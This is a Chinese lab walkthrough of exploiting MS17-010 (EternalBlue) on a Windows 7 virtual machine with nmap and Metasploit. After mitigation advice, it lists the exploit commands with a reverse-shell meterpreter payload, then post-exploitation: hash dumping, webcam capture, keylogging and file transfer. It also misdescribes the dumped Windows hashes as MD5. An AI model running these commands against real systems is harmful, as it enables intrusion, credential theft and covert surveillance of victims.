MS17-010漏洞复现+利用

1、 漏洞简述

漏洞名称：“永恒之蓝”漏洞

漏洞编号：MS17-010，CVE-2017-0143/0144/0145/0146/0147/0148

漏洞类型：缓冲区溢出漏洞

漏洞影响：信息泄露

CVSS评分：9.3（High）

利用难度：Medium

基础权限：不需要

2、组件概述

SMB(Server Message Block)是一个协议名，它能被用于Web连接和客户端与服务器之间的信息沟通。其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。

SMB1.0协议由于在文件共享传输过程中存在的传输效率低以及传输空间小等缺陷被人们所摒弃。为了更好的实现网络中文件的共享过程，在SMB1.0的基础上开发了新的网络文件传输协议，并将其命名为SMB2.0。

该协议在实现了文件共享传输的基本功能的基础上对文件传输的效率、文件缓存的空间以及文件并发传输等问题进行改进，使得在局域网或更高配置的网络环境下，文件传输过程的速度和效率等得到了很大的提升。

3、 漏洞影响

Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016

以上系统打开445端口都容易受到影响。

4、解决方案

• 禁用 SMBv1

• 对于客户端操作系统：

1. 打开“控制面板”，单击“程序”，然后单击“打开或关闭 Windows 功能”。

2. 在 Windows 功能窗口中，清除SMB1.0/CIFS 文件共享支持复选框，然后单击确定关闭窗口。

3. 重新启动系统。

• 对于服务器操作系统：

1. 打开服务器管理器，然后单击管理菜单并选择删除角色和功能。

2. 在功能窗口中，清除SMB1.0/CIFS 文件共享支持复选框，然后单击确定关闭窗口。

3. 重新启动系统。

• 更新Windows系统补丁：官方文档链接 

复现环境

攻击机： kali(ip:192168.137.5)

靶机：windows 2007 (ip:192.168.137.239)

一、使用nmap扫描靶机查看目标开放端口

命令为：nmap –T3 –A –v ip

-A 选项用于使用进攻性（Aggressive）方式扫描

-T3 指定扫描过程使用的时序（Timing），总有6个级别(0-5)， 级别越高，速度越快，但也容易被防火墙发现

-v 表示显示冗余（verbosity）信息，在扫描过程中显示扫描的细节，从而让用户了解当前的扫描状态

Nmap常用扫描命令

-sT：TCP connect扫描

-sS：TCP SYN扫描

-sF/-sX/-sN：通过发送一些特殊的标志位以避开设备或软件的检测

-sP：通过发送ICMP echo请求探测主机是否存活，原理同Ping

-sU：探测目标主机开放了哪些UDP端口

-sA：TCP ACK扫描，对防火墙上未屏蔽的端口进行探测

-sV：获取对应端口上更为详细的服务版本信息

-Pn：在扫描之前，不发送ICMP echo请求测试目标是否存活

-O：启动对于TCP/IP协议栈的指纹特征扫描以获取远程主机的操作系统类型等信息

-F：快速扫描模式，只扫描在nmap-services中列出的端口

扫描结果如图，可以看到目标开放了445端口，并且是win7的系统 

二、启用msf，命令为: msfconsole

三、搜索漏洞，命令为: search ms17-010

选择模块auxiliary/scanner/smb/smb_ms17_010 (或者直接选中编号：use 3——具体选中哪个编号要根据个人电脑来)

auxiliary模块来验证目标是否存在ms17-010漏洞，设置目标ip，命令：set rhosts 192.168.137.239

开始运行：run

可以看到，检测出目标可能存在ms17-010漏洞

四、重新选择Exploit 漏洞利用模块，发起攻击

search ms17-010

选择模块exploit/windows/smb/ms17_010_eternalblue

设置攻击负载               set payload windows/x64/meterpreter/reverse_tcp

设置受害者ip（win7） set rhost 192.168.137.239

设置攻击者ip（kali）   set lhost 192.168.137.5

run 开始攻击，等待一会儿，发现攻击成功

五、后渗透攻击

1.通过 meterpreter 获取屏幕快照： screenshot

可以看到成功截取win7屏幕

2. 上传文件到win7

upload 本机文件路径 你想放在目标主机的文件路径

这里我上传了一张周杰伦的图片放到win7的c盘

如果要下载文件，命令为 download 目标主机文件路径 你想放的本机文件路径

3.查看当前用户权限

查看权限，

Windows命令为：getuid

Linux命令为：whoami

可以看到目前是system用户，在 Windows中system用户是最高权限 ，比管理员组用户权限更高；在 Linux中root用户权限最高。

4. 知道权限的级别，进入shell

进入Windows命令行（CMD） 命令：shell

发现有乱码输入：chcp 65001    //用于更改当前命令行的代码页为UTF-8，需要注意的是，虽然 chcp 65001 可以解决很多编码问题，但在某些情况下，它可能不是完美的解决方案

输入ipconfig，查看目标主机ip信息

5. 获取用户和密码，命令hashdump

可以看到密码被MD5加密，可以访问下面的网站解密

md5在线解密破解,md5解密加密

我这里没有设置密码

6.开启摄像头

开启摄像头

webcam_list -->查看摄像头     

这里我用的是虚拟机win7没检测到摄像头

在win7的虚拟机里选择可移动设备，安装摄像头驱动

再次查看，成功检测到摄像头

webcam_snap -->通过摄像头拍照

这里我就不露脸啦哈哈哈

webcam_stream -->通过摄像头开启视频

这里我就不演示了

7.开启键盘监听

ps  //查看windows系统运行进程

migrate -P pid  //绑定进程的PID

explorer.exe 是Windows的程序管理器或者文件资源管理器，这里我们绑定它的PID，每个人都不一样

keyscan_start  //开始监听

keyscan_dump   //获取监听

可以看到win7的输入内容

keyscan_stop  //停止监听